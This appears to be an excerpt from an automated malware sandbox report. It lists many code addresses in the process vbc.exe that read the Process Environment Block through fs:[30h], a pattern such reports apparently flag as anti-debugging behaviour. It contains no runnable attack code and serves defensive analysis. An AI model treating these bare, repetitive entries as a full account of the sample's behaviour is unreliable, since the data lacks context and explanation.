            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052216CC mov eax, dword ptr fs:[00000030h]3_2_052216CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052216CC mov eax, dword ptr fs:[00000030h]3_2_052216CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052216CC mov eax, dword ptr fs:[00000030h]3_2_052216CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052216CC mov eax, dword ptr fs:[00000030h]3_2_052216CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E06F1 mov eax, dword ptr fs:[00000030h]3_2_051E06F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E06F1 mov eax, dword ptr fs:[00000030h]3_2_051E06F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DE6F2 mov eax, dword ptr fs:[00000030h]3_2_051DE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DE6F2 mov eax, dword ptr fs:[00000030h]3_2_051DE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DE6F2 mov eax, dword ptr fs:[00000030h]3_2_051DE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DE6F2 mov eax, dword ptr fs:[00000030h]3_2_051DE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F36EE mov eax, dword ptr fs:[00000030h]3_2_051F36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F36EE mov eax, dword ptr fs:[00000030h]3_2_051F36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F36EE mov eax, dword ptr fs:[00000030h]3_2_051F36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F36EE mov eax, dword ptr fs:[00000030h]3_2_051F36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F36EE mov eax, dword ptr fs:[00000030h]3_2_051F36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F36EE mov eax, dword ptr fs:[00000030h]3_2_051F36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051936EF mov eax, dword ptr fs:[00000030h]3_2_051936EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518D6E0 mov eax, dword ptr fs:[00000030h]3_2_0518D6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518D6E0 mov eax, dword ptr fs:[00000030h]3_2_0518D6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515B136 mov eax, dword ptr fs:[00000030h]3_2_0515B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515B136 mov eax, dword ptr fs:[00000030h]3_2_0515B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515B136 mov eax, dword ptr fs:[00000030h]3_2_0515B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515B136 mov eax, dword ptr fs:[00000030h]3_2_0515B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05161131 mov eax, dword ptr fs:[00000030h]3_2_05161131
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05161131 mov eax, dword ptr fs:[00000030h]3_2_05161131
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05220115 mov eax, dword ptr fs:[00000030h]3_2_05220115
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0520A118 mov ecx, dword ptr fs:[00000030h]3_2_0520A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0520A118 mov eax, dword ptr fs:[00000030h]3_2_0520A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0520A118 mov eax, dword ptr fs:[00000030h]3_2_0520A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0520A118 mov eax, dword ptr fs:[00000030h]3_2_0520A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05190124 mov eax, dword ptr fs:[00000030h]3_2_05190124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05166154 mov eax, dword ptr fs:[00000030h]3_2_05166154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05166154 mov eax, dword ptr fs:[00000030h]3_2_05166154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515C156 mov eax, dword ptr fs:[00000030h]3_2_0515C156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05167152 mov eax, dword ptr fs:[00000030h]3_2_05167152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F4144 mov eax, dword ptr fs:[00000030h]3_2_051F4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F4144 mov eax, dword ptr fs:[00000030h]3_2_051F4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F4144 mov ecx, dword ptr fs:[00000030h]3_2_051F4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F4144 mov eax, dword ptr fs:[00000030h]3_2_051F4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F4144 mov eax, dword ptr fs:[00000030h]3_2_051F4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05159148 mov eax, dword ptr fs:[00000030h]3_2_05159148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05159148 mov eax, dword ptr fs:[00000030h]3_2_05159148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05159148 mov eax, dword ptr fs:[00000030h]3_2_05159148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05159148 mov eax, dword ptr fs:[00000030h]3_2_05159148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051F9179 mov eax, dword ptr fs:[00000030h]3_2_051F9179
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F172 mov eax, dword ptr fs:[00000030h]3_2_0515F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05235152 mov eax, dword ptr fs:[00000030h]3_2_05235152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E019F mov eax, dword ptr fs:[00000030h]3_2_051E019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E019F mov eax, dword ptr fs:[00000030h]3_2_051E019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E019F mov eax, dword ptr fs:[00000030h]3_2_051E019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E019F mov eax, dword ptr fs:[00000030h]3_2_051E019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515A197 mov eax, dword ptr fs:[00000030h]3_2_0515A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515A197 mov eax, dword ptr fs:[00000030h]3_2_0515A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515A197 mov eax, dword ptr fs:[00000030h]3_2_0515A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052111A4 mov eax, dword ptr fs:[00000030h]3_2_052111A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052111A4 mov eax, dword ptr fs:[00000030h]3_2_052111A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052111A4 mov eax, dword ptr fs:[00000030h]3_2_052111A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052111A4 mov eax, dword ptr fs:[00000030h]3_2_052111A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051B7190 mov eax, dword ptr fs:[00000030h]3_2_051B7190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A0185 mov eax, dword ptr fs:[00000030h]3_2_051A0185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517B1B0 mov eax, dword ptr fs:[00000030h]3_2_0517B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0521C188 mov eax, dword ptr fs:[00000030h]3_2_0521C188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0521C188 mov eax, dword ptr fs:[00000030h]3_2_0521C188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052361E5 mov eax, dword ptr fs:[00000030h]3_2_052361E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519D1D0 mov eax, dword ptr fs:[00000030h]3_2_0519D1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519D1D0 mov ecx, dword ptr fs:[00000030h]3_2_0519D1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DE1D0 mov eax, dword ptr fs:[00000030h]3_2_051DE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DE1D0 mov eax, dword ptr fs:[00000030h]3_2_051DE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DE1D0 mov ecx, dword ptr fs:[00000030h]3_2_051DE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DE1D0 mov eax, dword ptr fs:[00000030h]3_2_051DE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DE1D0 mov eax, dword ptr fs:[00000030h]3_2_051DE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052261C3 mov eax, dword ptr fs:[00000030h]3_2_052261C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052261C3 mov eax, dword ptr fs:[00000030h]3_2_052261C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051901F8 mov eax, dword ptr fs:[00000030h]3_2_051901F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052351CB mov eax, dword ptr fs:[00000030h]3_2_052351CB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051851EF mov eax, dword ptr fs:[00000030h]3_2_051851EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051651ED mov eax, dword ptr fs:[00000030h]3_2_051651ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517E016 mov eax, dword ptr fs:[00000030h]3_2_0517E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517E016 mov eax, dword ptr fs:[00000030h]3_2_0517E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517E016 mov eax, dword ptr fs:[00000030h]3_2_0517E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517E016 mov eax, dword ptr fs:[00000030h]3_2_0517E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522903E mov eax, dword ptr fs:[00000030h]3_2_0522903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522903E mov eax, dword ptr fs:[00000030h]3_2_0522903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522903E mov eax, dword ptr fs:[00000030h]3_2_0522903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522903E mov eax, dword ptr fs:[00000030h]3_2_0522903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515A020 mov eax, dword ptr fs:[00000030h]3_2_0515A020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515C020 mov eax, dword ptr fs:[00000030h]3_2_0515C020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05235060 mov eax, dword ptr fs:[00000030h]3_2_05235060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05162050 mov eax, dword ptr fs:[00000030h]3_2_05162050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518B052 mov eax, dword ptr fs:[00000030h]3_2_0518B052
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05171070 mov eax, dword ptr fs:[00000030h]3_2_05171070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05171070 mov ecx, dword ptr fs:[00000030h]3_2_05171070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05171070 mov eax, dword ptr fs:[00000030h]3_2_05171070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05171070 mov eax, dword ptr fs:[00000030h]3_2_05171070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05171070 mov eax, dword ptr fs:[00000030h]3_2_05171070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05171070 mov eax, dword ptr fs:[00000030h]3_2_05171070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05171070 mov eax, dword ptr fs:[00000030h]3_2_05171070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05171070 mov eax, dword ptr fs:[00000030h]3_2_05171070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05171070 mov eax, dword ptr fs:[00000030h]3_2_05171070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05171070 mov eax, dword ptr fs:[00000030h]3_2_05171070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05171070 mov eax, dword ptr fs:[00000030h]3_2_05171070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05171070 mov eax, dword ptr fs:[00000030h]3_2_05171070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05171070 mov eax, dword ptr fs:[00000030h]3_2_05171070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518C073 mov eax, dword ptr fs:[00000030h]3_2_0518C073
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DD070 mov ecx, dword ptr fs:[00000030h]3_2_051DD070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E106E mov eax, dword ptr fs:[00000030h]3_2_051E106E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0520705E mov ebx, dword ptr fs:[00000030h]3_2_0520705E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0520705E mov eax, dword ptr fs:[00000030h]3_2_0520705E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05165096 mov eax, dword ptr fs:[00000030h]3_2_05165096
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519909C mov eax, dword ptr fs:[00000030h]3_2_0519909C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518D090 mov eax, dword ptr fs:[00000030h]3_2_0518D090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0518D090 mov eax, dword ptr fs:[00000030h]3_2_0518D090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515D08D mov eax, dword ptr fs:[00000030h]3_2_0515D08D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052260B8 mov eax, dword ptr fs:[00000030h]3_2_052260B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052260B8 mov ecx, dword ptr fs:[00000030h]3_2_052260B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516208A mov eax, dword ptr fs:[00000030h]3_2_0516208A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E20DE mov eax, dword ptr fs:[00000030h]3_2_051E20DE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051890DB mov eax, dword ptr fs:[00000030h]3_2_051890DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051770C0 mov eax, dword ptr fs:[00000030h]3_2_051770C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051770C0 mov ecx, dword ptr fs:[00000030h]3_2_051770C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051770C0 mov ecx, dword ptr fs:[00000030h]3_2_051770C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051770C0 mov eax, dword ptr fs:[00000030h]3_2_051770C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051770C0 mov ecx, dword ptr fs:[00000030h]3_2_051770C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051770C0 mov ecx, dword ptr fs:[00000030h]3_2_051770C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051770C0 mov eax, dword ptr fs:[00000030h]3_2_051770C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051770C0 mov eax, dword ptr fs:[00000030h]3_2_051770C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051770C0 mov eax, dword ptr fs:[00000030h]3_2_051770C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051770C0 mov eax, dword ptr fs:[00000030h]3_2_051770C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051770C0 mov eax, dword ptr fs:[00000030h]3_2_051770C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051770C0 mov eax, dword ptr fs:[00000030h]3_2_051770C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051770C0 mov eax, dword ptr fs:[00000030h]3_2_051770C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051770C0 mov eax, dword ptr fs:[00000030h]3_2_051770C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051770C0 mov eax, dword ptr fs:[00000030h]3_2_051770C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051770C0 mov eax, dword ptr fs:[00000030h]3_2_051770C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051770C0 mov eax, dword ptr fs:[00000030h]3_2_051770C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051770C0 mov eax, dword ptr fs:[00000030h]3_2_051770C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DD0C0 mov eax, dword ptr fs:[00000030h]3_2_051DD0C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DD0C0 mov eax, dword ptr fs:[00000030h]3_2_051DD0C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515C0F0 mov eax, dword ptr fs:[00000030h]3_2_0515C0F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A20F0 mov ecx, dword ptr fs:[00000030h]3_2_051A20F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515A0E3 mov ecx, dword ptr fs:[00000030h]3_2_0515A0E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_052350D9 mov eax, dword ptr fs:[00000030h]3_2_052350D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051850E4 mov eax, dword ptr fs:[00000030h]3_2_051850E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051850E4 mov ecx, dword ptr fs:[00000030h]3_2_051850E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051680E9 mov eax, dword ptr fs:[00000030h]3_2_051680E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515C310 mov ecx, dword ptr fs:[00000030h]3_2_0515C310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05180310 mov ecx, dword ptr fs:[00000030h]3_2_05180310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522132D mov eax, dword ptr fs:[00000030h]3_2_0522132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522132D mov eax, dword ptr fs:[00000030h]3_2_0522132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519A30B mov eax, dword ptr fs:[00000030h]3_2_0519A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519A30B mov eax, dword ptr fs:[00000030h]3_2_0519A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519A30B mov eax, dword ptr fs:[00000030h]3_2_0519A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E930B mov eax, dword ptr fs:[00000030h]3_2_051E930B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E930B mov eax, dword ptr fs:[00000030h]3_2_051E930B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E930B mov eax, dword ptr fs:[00000030h]3_2_051E930B
